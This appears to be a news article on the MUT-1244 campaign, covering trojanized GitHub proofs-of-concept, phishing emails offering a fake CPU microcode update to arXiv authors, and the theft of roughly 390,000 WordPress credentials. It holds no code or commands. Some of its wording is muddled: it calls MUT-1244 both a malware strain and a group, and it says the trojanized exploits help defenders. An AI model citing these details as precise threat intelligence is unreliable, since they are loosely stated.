Malware Campaign Exploits GitHub and Phishing Strategies to Deploy Attacks
In a concerning revelation shared by Datadog, a new malware strain identified as MUT-1244 has been found to utilize a combination of tactics to deploy its malicious payloads, specifically through avenues that exploit both social engineering and legitimate platforms. This campaign, which has come to light recently, highlights the evolving strategies employed by threat actors.
The researchers discovered that MUT-1244 managed to install its second-stage malware using a collection of at least 49 malicious entries on GitHub. These packages leveraged Trojanized proofs-of-concept that target well-known security vulnerabilities, which not only serve malicious purposes but also help security professionals understand how such vulnerabilities can be exploited or mitigated.
Phishing emails represent another significant tactic employed in this campaign. Datadog’s research reveals that MUT-1244 utilized a phishing template that included over 2,700 email addresses sourced from arXiv, a popular repository among academic and professional researchers in the field of high-performance computing. The emails, purportedly encouraging recipients to install a CPU microcode update promising substantial performance improvements, were circulated between October 5 and October 21.
The phishing campaign included carefully crafted messages aimed at individuals involved in software development and research, further adding to the scheme’s deceptive credibility. The efficacy of these emails is bolstered by the attackers’ strategic exploitation of legitimate sources, as many of the malicious packages were incorporated into recognized repositories such as Feedly Threat Intelligence and Vulnmon. This integration not only amplifies their perceived legitimacy but also increases the chances of someone inadvertently executing the harmful code.
In a broader context, the attackers’ use of the @0xengine/xmlrpc tool facilitated the theft of approximately 390,000 credentials from compromised machines. Investigation indicates that these credentials were intended for accessing administrative accounts on websites utilizing the WordPress content management system, underscoring the scale of the data breach.
The sophistication of the campaign—marked by its operational duration, precision, and the advanced nature of the backdoor—suggests that the group behind it is highly skilled and motivated. They did, however, make a critical misstep by leaving behind a fishing email template and scraped email addresses accessible in a public repository, which may lead to the identification and mitigation of their efforts.
Despite the apparent organization of the attack, the overarching motives of the threat actors remain ambiguous. While the proliferation of cryptocurrency mining tools may point to financial gain as a motivation, targeting security personnel is not a typical choice for such activities. Additionally, this raises questions regarding the role of researchers in the attackers’ strategy, particularly given the high detection rates associated with cryptocurrency mining tools.
As organizations assess the implications of this campaign, indicators from several reports, including those from Checkmarx and Datadog, can aid in determining whether they have been compromised. By analyzing the tactics and techniques outlined in the MITRE ATT&CK framework, business owners can better understand the nature of the threats and evaluate their own cybersecurity posture.
In the fast-evolving landscape of cyber threats, remaining vigilant against phishing and leveraging public repositories responsibly is crucial for all organizations. The MUT-1244 campaign serves as a reminder of the sophisticated methods used by adversaries and the importance of proactive security measures.
